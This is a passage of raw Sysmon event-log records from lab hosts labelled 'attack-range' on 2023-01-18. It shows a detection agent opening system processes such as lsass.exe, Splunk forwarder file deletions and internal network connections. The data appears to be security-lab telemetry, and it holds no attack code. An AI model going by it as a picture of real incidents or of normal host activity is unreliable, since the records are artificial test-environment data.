Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3E00-00000000B002}344C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017865Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:02.736{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3900-00000000B002}1148C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017864Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:02.733{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC46-63C7-3500-00000000B002}2744C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017863Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:02.732{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC45-63C7-2200-00000000B002}2524C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017862Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:02.725{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017861Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:02.722{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1E00-00000000B002}1200C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017860Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:02.721{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1D00-00000000B002}1080C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017859Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:02.709{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1B00-00000000B002}1944C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017858Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:02.707{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1900-00000000B002}1888C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017857Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:02.698{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1800-00000000B002}1804C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017856Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:02.696{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1700-00000000B002}1260C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017855Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:02.678{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1600-00000000B002}1224C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017854Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:02.671{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1500-00000000B002}1104C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017853Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:02.654{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1400-00000000B002}1084C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017852Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:02.643{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1300-00000000B002}440C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017851Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:02.629{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1200-00000000B002}1012C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017850Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:02.592{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1100-00000000B002}952C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017849Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:02.584{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1000-00000000B002}944C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017848Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:02.577{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0F00-00000000B002}908C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017847Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:02.569{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0E00-00000000B002}900C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017846Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:02.561{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0D00-00000000B002}780C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017845Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:02.552{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0C00-00000000B002}728C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017844Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:02.543{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017843Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:02.538{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0900-00000000B002}572C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 23542300x800000000000000017842Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:02.169{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA6DA66051E2BD800E55B15AB9AE7226,SHA256=E724073B9B6594A0F259DD8E92B39F581EECB6BCB6A1A07606B5EF310EA44EB7,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000045476Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:59.702{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56426-false10.0.1.12-8000- 23542300x800000000000000045478Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:03.343{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22F93795E29726690575390E8015349C,SHA256=496AE6F8C0A9E18776E5BBEC2E21E6FB33083E3B06769FCF3982B38FE367F217,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017875Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:03.423{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C5254CD0965478DAF765B61B76912B6D,SHA256=8560B7CF39DCB2B85BE81B8403988EDCD450B7D467618443EF96E32C72BAAF71,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000017874Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:02.091{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50154-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000017877Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:04.545{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F445F5CFEE11BD7D6C238837AB6B089F,SHA256=D05FF91FA92FD0A6997DE44AF99EF0D029F08D832084AFC5EA122A465F26FB26,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045479Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:04.455{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88AF27B1E5F9CF0420B8471CE883EBEF,SHA256=8ED23726D8BF52FCEB4EA6C07243B26C0D9EF8FC612150CB37BFD3AB8449D324,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017876Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:04.186{E5A8D418-DCC0-63C7-9F00-00000000B002}3096NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=B7E616F96B7BBFB82BF7130F79C861FF,SHA256=784F4924BD8FD182C26EA63E1A41C4AA6BD4EA85FEA6DA0417976E9A8570384D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045480Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:05.642{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6DCE80267C771E68318493EDEAC293E1,SHA256=3157789636F63B4F664E581C32B92E49CA8A703EE609FEBD827A4C4C66043797,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017878Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:05.636{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E47A2313D82CC2CA2DEC7AEA45DADC93,SHA256=33FC257367C82D7601712938E3C13E3AEC7CC796262E4DFB8ECEED6D752C8625,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045481Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:06.721{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33615C89452ADD1F1CA4EE04EA91EAED,SHA256=2B803F8F95BC723E4F7860E2E0C3D516E715654A8FA13CFAB7BF453EAAF09DDE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017880Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:06.719{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C85CCD1ED1AF96D793A08D227F9474F3,SHA256=5A5EF8C2E07DF20C20E4459CE4BAF63C9795BF284CFE68377CBB6F5608068896,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000017879Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:04.045{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50155-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8089- 23542300x800000000000000045482Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:07.819{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program 